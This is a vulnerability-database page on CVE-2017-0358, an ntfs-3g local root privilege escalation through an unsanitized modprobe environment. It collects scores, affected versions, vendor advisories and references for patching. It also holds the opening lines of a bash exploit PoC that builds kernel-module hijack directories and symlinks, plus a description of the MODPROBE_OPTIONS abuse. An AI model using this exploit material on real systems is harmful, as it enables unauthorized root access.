CVE-2017-0358
published 2018-04-13CVE-2017-0358: Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with…
PriorityP346high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
2.28%
80.9th percentile
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | ntfs-3g | < ntfs-3g 1:2016.2.22AR.1-4 (bookworm) | ntfs-3g 1:2016.2.22AR.1-4 (bookworm) |
| ntfs-3g | ntfs-3g | — | — |
| tuxera | ntfs-3g | <= 2016.2.22 | — |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
| tuxera | ntfs-3g | >= 0 < 1:2016.2.22AR.1-4 | 1:2016.2.22AR.1-4 |
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.8HIGH
vendor_debian7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
NTFS-3G vulnerability
vendor_ubuntu·2017-02-01
CVE-2017-0358 NTFS-3G vulnerability
Title: NTFS-3G vulnerability
Summary: NTFS-3G could be made to load kernel modules as an administrator.
Jann Horn discovered that NTFS-3G incorrectly filtered environment variables
when using the modprobe utility. A local attacker could possibly use this issue
to load arbitrary kernel modules.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2017-0358: ntfs-3g - Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driv...
vendor_debian·2017·CVSS 7.8
CVE-2017-0358 [HIGH] CVE-2017-0358: ntfs-3g - Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driv...
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
Scope: local
bookworm: resolved (fixed in 1:2016.2.22AR.1-4)
bullseye: resolved (fixed in 1:2016.2.22AR.1-4)
forky: resolved (fixed in 1:2016.2.22AR.1-4)
sid: resolved (fixed in 1:2016.2.22AR.1-4)
trixie: resolved (fixed in 1:2016.2.22AR.1-4)
GHSA
GHSA-vghw-r4fc-pgpf: Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe
ghsa_unreviewed·2022-05-13
CVE-2017-0358 [HIGH] CWE-269 GHSA-vghw-r4fc-pgpf: Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
OSV
CVE-2017-0358: Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe
osv·2018-04-13·CVSS 7.8
CVE-2017-0358 [HIGH] CVE-2017-0358: Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe
Jann Horn of Google Project Zero discovered that NTFS-3G, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe with elevated privileges. A local user can take advantage of this flaw for local root privilege escalation.
No detection rules found.
Exploit-DB
ntfs-3g - Unsanitized modprobe Environment Privilege Escalation
exploitdb·2017-02-14
CVE-2017-0358 ntfs-3g - Unsanitized modprobe Environment Privilege Escalation
ntfs-3g - Unsanitized modprobe Environment Privilege Escalation
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
ntfs-3g is installed by default e.g. on Ubuntu and comes with a
setuid root program /bin/ntfs-3g. When this program is invoked on a
system whose kernel does not support FUSE filesystems (detected by
get_fuse_fstype()), ntfs-3g attempts to load the "fuse" module using
/sbin/modprobe via load_fuse_module().
The issue is that /sbin/modprobe is not designed to run in a setuid
context. As the manpage of modprobe explicitly points out:
The MODPROBE_OPTIONS environment variable can also be used
to pass arguments to modprobe.
Therefore, on a system that does not seem to support FUSE filesystems,
an attacker can set the environment variable MODPROBE_OPTION
Exploit-DB
ntfs-3g (Debian 9) - Local Privilege Escalation
exploitdb·2017-02-03·CVSS 7.8
CVE-2017-0358 [HIGH] ntfs-3g (Debian 9) - Local Privilege Escalation
ntfs-3g (Debian 9) - Local Privilege Escalation
---
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln
Metasploit
Debian/Ubuntu ntfs-3g Local Privilege Escalation
metasploit
Debian/Ubuntu ntfs-3g Local Privilege Escalation
Debian/Ubuntu ntfs-3g Local Privilege Escalation
ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe. This can be abused to load a kernel module and execute a binary payload as the root user.
http://www.openwall.com/lists/oss-security/2017/02/04/1http://www.securityfocus.com/bid/95987https://marc.info/?l=oss-security&m=148594671929354&w=2https://security.gentoo.org/glsa/201702-10https://www.debian.org/security/2017/dsa-3780https://www.exploit-db.com/exploits/41240/https://www.exploit-db.com/exploits/41356/http://www.openwall.com/lists/oss-security/2017/02/04/1http://www.securityfocus.com/bid/95987https://marc.info/?l=oss-security&m=148594671929354&w=2https://security.gentoo.org/glsa/201702-10https://www.debian.org/security/2017/dsa-3780https://www.exploit-db.com/exploits/41240/https://www.exploit-db.com/exploits/41356/
2018-04-13
Published